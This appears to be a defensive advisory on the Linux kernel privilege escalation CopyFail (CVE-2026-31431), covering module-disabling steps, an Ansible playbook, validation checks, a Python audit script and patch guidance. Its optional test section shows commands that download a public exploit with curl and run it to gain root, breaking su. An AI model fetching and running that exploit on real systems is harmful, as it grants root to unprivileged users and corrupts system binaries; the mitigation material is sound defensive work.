TL;DR
CopyFail (CVE-2026-31431) is a kernel-level LPE affecting every major Linux distro since 2017. Disable the algif_aead kernel module immediately to remove the attack surface, then patch kernels on your normal maintenance schedule.
Impact: Any unprivileged process becomes root. This chains with web RCE, weak credentials, or plugin vulnerabilities to escalate from application-level compromise to kernel control.
Immediate action (5 minutes per host)
Run as root on every host:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead || true # "is not currently loaded" is fine; "is in use" is not, see below
The install line makes every future load attempt run /bin/false instead of loading the module. That covers the kernel's own autoload, which is what happens when any process binds an AF_ALG socket of type "aead", so the module cannot come back on its own. rmmod removes it if it is currently loaded and idle; if rmmod reports the module is in use, some process holds an open aead socket: restart that process and run rmmod again (the install line already stops it from being reloaded). If algif_aead is compiled into your kernel rather than built as a module, no modprobe.d setting can remove it and only a patched kernel helps:
grep -w algif_aead /lib/modules/$(uname -r)/modules.builtin # Any output means it is built in
Verify:
lsmod | grep algif_aead # Should return nothing
cat /etc/modprobe.d/disable-algif.conf # Should show the install line
Then patch your kernel to one that carries mainline commit a664bf3d603d or later. All major distros have releases available.
Ansible Deployment
Deploy across your Magento infrastructure in one run:
- hosts: magento_servers
  become: true
  tasks:
    - name: Disable algif_aead module
      copy:
        dest: /etc/modprobe.d/disable-algif.conf
        content: |
          install algif_aead /bin/false
        owner: root
        group: root
        mode: '0644'

    - name: Check if algif_aead module is loaded
      shell: lsmod | grep -w algif_aead
      register: algif_loaded
      failed_when: false
      changed_when: false

    - name: Unload algif_aead module
      command: rmmod algif_aead
      when: algif_loaded.rc == 0
Run once:
ansible-playbook deploy-algif-disable.yaml -i hosts.yaml
Validation
Check each host individually. The lsmod and socket checks should return nothing (or at least no line mentioning algif_aead or AF_ALG), while the cat should print the install line. The socket checks only show whether some process currently holds an AF_ALG socket; they do not tell you whether the module can still be loaded:
# Check module is not loaded
lsmod | grep algif_aead
# Check modprobe configuration is in place
cat /etc/modprobe.d/disable-algif.conf
# Verify AF_ALG sockets aren't being used by applications
ss -xa | grep AF_ALG
lsof 2>/dev/null | grep AF_ALG
For more assurance you can either run the public PoC yourself or simply try to bind an AF_ALG aead socket with Python. Note what each proves: the bind test shows whether the mitigation (no loadable algif_aead) is in effect, and it will still warn on a patched kernel that has the module enabled; only the PoC tells you whether the running kernel is actually exploitable.
Test with Socket Creation
python3 -c '
import socket
try:
    s = socket.socket(38, 5, 0)  # AF_ALG, SOCK_SEQPACKET; only needs af_alg
    s.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))  # bind is what loads algif_aead
    print("[!] WARNING: System allows AF_ALG aead socket creation."
          " Mitigation not in place; vulnerable to Copy Fail CVE-2026-31431 unless the kernel is patched.")
except Exception as e:
    print(f"[+] SAFE: Cannot bind AF_ALG aead socket. ({e})")
'
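The validation checks above, folded into one audit script you can run on each host. This is an added example, not code from the advisory or from copy.fail. It assumes the standard paths (/proc/modules, /etc/modprobe.d/*.conf, /lib/modules/<release>/modules.builtin) and repeats the same AF_ALG bind as the one-liner; the function names (module_loaded, module_builtin, install_directive_blocks, aead_bind_allowed, audit, verdict) are mine. It adds two things the one-liner does not: it reports when algif_aead is compiled into the kernel, in which case no modprobe.d directive can help, and it distinguishes a blacklist line (not sufficient) from the install directive.

```python
#!/usr/bin/env python3
"""Audit one host for the algif_aead mitigation.

Added example, not the advisory's code. The parsers take file contents as
strings so they can be exercised on constructed input; audit() reads the real
files at the assumed standard paths.
"""
import glob
import os
import re
import socket

MODULE = "algif_aead"
# 'install <module> <cmd>' makes modprobe run <cmd> instead of loading the module;
# /bin/false and /bin/true both turn the load into a no-op.
DISABLE_TARGETS = {"/bin/false", "/bin/true", "/usr/bin/false", "/usr/bin/true"}
_INSTALL_RE = re.compile(r"^\s*install\s+(\S+)\s+(.+?)\s*$")


def module_loaded(proc_modules_text):
    """True if MODULE is listed in /proc/modules (the data behind lsmod)."""
    return any(line.split()[0] == MODULE
               for line in proc_modules_text.splitlines() if line.strip())


def module_builtin(modules_builtin_text):
    """True if MODULE is compiled into the kernel (lines look like
    kernel/crypto/algif_aead.ko); then no modprobe.d directive can remove it."""
    return any(os.path.basename(line.strip()).split(".")[0] == MODULE
               for line in modules_builtin_text.splitlines() if line.strip())


def install_directive_blocks(conf_text):
    """True if the modprobe.d text contains 'install algif_aead /bin/false' (or /bin/true).

    A 'blacklist' line is deliberately not accepted: modprobe applies the
    blacklist only when called with -b (udev does), and the kernel's own
    request_module() runs 'modprobe -q -- algif-aead' without it. 'install'
    is honoured on every path, which is why the advisory uses it.
    """
    for line in conf_text.splitlines():
        m = _INSTALL_RE.match(line.split("#", 1)[0])  # ignore trailing comments
        if m and m.group(1) == MODULE and m.group(2).split()[0] in DISABLE_TARGETS:
            return True
    return False


def aead_bind_allowed(alg="authencesn(hmac(sha256),cbc(aes))"):
    """Repeat the advisory's bind test; returns (allowed, detail).

    socket() only needs af_alg; bind(('aead', ...)) is what asks the kernel
    for algif_aead, so with the mitigation in place socket() succeeds and
    bind() fails with ENOENT. Without the install directive this bind
    autoloads the module. Success says nothing about whether the kernel is patched.
    """
    af_alg = getattr(socket, "AF_ALG", 38)  # named in Python 3.6+; 38 on Linux
    try:
        with socket.socket(af_alg, socket.SOCK_SEQPACKET, 0) as s:
            s.bind(("aead", alg))
        return True, "bind succeeded"
    except OSError as e:
        return False, f"{type(e).__name__}: {e}"


def _read(path):
    try:
        with open(path) as f:
            return f.read()
    except OSError:  # a missing file counts as "not present"
        return ""


def audit(proc_modules="/proc/modules", modprobe_dir="/etc/modprobe.d",
          modules_builtin=None):
    """Collect the four findings for this host."""
    if modules_builtin is None:
        modules_builtin = f"/lib/modules/{os.uname().release}/modules.builtin"
    confs = sorted(glob.glob(os.path.join(modprobe_dir, "*.conf")))
    allowed, detail = aead_bind_allowed()
    return {
        "loaded": module_loaded(_read(proc_modules)),
        "builtin": module_builtin(_read(modules_builtin)),
        "install_directive": any(install_directive_blocks(_read(p)) for p in confs),
        "aead_bind_allowed": allowed,
        "bind_detail": detail,
    }


def verdict(findings):
    """One line per host that a fleet-wide run can grep for."""
    if findings["builtin"]:
        return "NOT MITIGABLE: algif_aead is built into this kernel; only a patched kernel helps"
    if findings["loaded"] or findings["aead_bind_allowed"]:
        return "NOT MITIGATED: the aead interface is still reachable"
    if not findings["install_directive"]:
        return "PARTIAL: not loaded now, but nothing stops it being autoloaded later"
    return "MITIGATED: unloaded, install directive present, aead bind refused"


if __name__ == "__main__":
    findings = audit()
    for key, value in findings.items():
        print(f"{key:18} {value}")
    print(verdict(findings))
```

Run it as any user. Only the bind test touches the kernel, and if the module is merely unloaded with no install directive in place, that bind autoloads algif_aead, which the script then reports as NOT MITIGATED. A MITIGATED verdict means the module path is closed on this host; it does not tell you whether the running kernel is patched.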
Test with Public PoC
NOTE: If you are vulnerable, this WILL break your su binary and allow any user on the system to become root. See below if you need to revert this.
$ curl https://copy.fail/exp > exp.py
$ cat exp.py # READ/COMPARE WITH SRC BEFORE RUNNING
$ python3 exp.py && su
$ id
uid=0(root) gid=1002(user) groups=1002(user)
How to Revert the Proof of Concept
If you ran the proof of concept and it broke su (whether it succeeded or merely corrupted the binary), only the in-memory page-cache copy of su is corrupted; the file on disk is untouched. Two ways to recover:
- Reboot the machine; su is reloaded from disk and works again.
- Drop the page cache from a root shell. sudo still works because it is a separate binary, but note that `sudo echo 3 > /proc/sys/vm/drop_caches` does NOT work: the redirection is performed by your unprivileged shell, not by sudo. Run the whole pipeline as root instead:
sudo sh -c 'sync; echo 3 > /proc/sys/vm/drop_caches'
Why Disable algif_aead First Instead of Patching Immediately?
- Speed: a config line and an rmmod, seconds per host and no reboot, versus the reboot window a kernel update needs
- No impact: almost nothing in production uses the AF_ALG aead interface, and the other AF_ALG types (algif_hash, algif_skcipher, algif_rng) are separate modules that this change does not touch
- Bridge time: gives you time to test kernel patches in staging before rolling to production
- Defence in depth: removes an interface almost nobody needs, and it stays closed after the kernel is patched
Performance Impact
Zero for applications that do not use the AF_ALG aead interface, which is nearly all of them. An application that does use it gets ENOENT when it binds the socket and has to fall back to its userspace crypto library, which is how the vast majority of software does its crypto already; in practice there is no measurable performance difference. Before deploying, grep your application stack for AF_ALG use so that any such fallback is known rather than discovered.
Kernel Patching
Where to find patched kernels:
- Ubuntu / Debian: apt update && apt upgrade (then confirm from the kernel package changelog that it carries the fix from mainline commit a664bf3d603d; the version string alone does not tell you)
- RHEL / CentOS / Fedora: yum update kernel or dnf update kernel
- Amazon Linux 2: yum update kernel
- SUSE: zypper update kernel-default
- Arch: pacman -Syu
What to check:
uname -r # Running kernel version; it only changes after you reboot into the new kernel
Most distributions have released patched kernels by 2026-04-29. Update aggressively.